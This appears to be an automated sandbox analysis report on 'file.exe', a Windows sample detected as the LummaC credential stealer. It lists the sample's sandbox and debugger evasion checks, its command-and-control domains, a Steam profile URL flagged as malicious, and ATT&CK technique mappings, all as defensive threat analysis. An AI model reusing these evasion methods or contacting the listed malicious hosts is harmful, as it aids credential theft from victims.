    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.1330896280.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1579192942.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.00000000011B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: file.exe, 00000000.00000002.1579192942.000000000112E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006900D0 LdrInitializeThunk,0_2_006900D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ;UProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://avatars.akamai.steamstatic0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrue
      		unknown
      sergei-esenin.com
      		172.67.206.204
      		truetrue
        		unknown
        eaglepawnoy.store
        		unknown
        		unknowntrue
          		unknown
          bathdoomgaz.store
          		unknown
          		unknowntrue
            		unknown
            spirittunek.store
            		unknown
            		unknowntrue
              		unknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknowntrue
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknowntrue
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          		unknown
                          dissapoiznw.storetrue
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            		unknown
                            eaglepawnoy.storetrue
                              		unknown
                              bathdoomgaz.storetrue
                                		unknown
                                clearancek.sitetrue
                                  		unknown
                                  spirittunek.storetrue
                                    		unknown
                                    licendfilteo.sitetrue
                                      		unknown
                                      mobbipenju.storetrue
                                        		unknown
                                        https://sergei-esenin.com/apitrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1337224103.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://player.vimeo.comfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5ffile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.youtube.comfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.comfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://s.ytimg.com;file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://sergei-esenin.com:443/apiwfile.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://steam.tv/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://sketchfab.comfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://lv.queniujq.cnfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            		unknown
                                                            https://www.youtube.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1337224103.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.google.com/recaptcha/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://checkout.steampowered.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
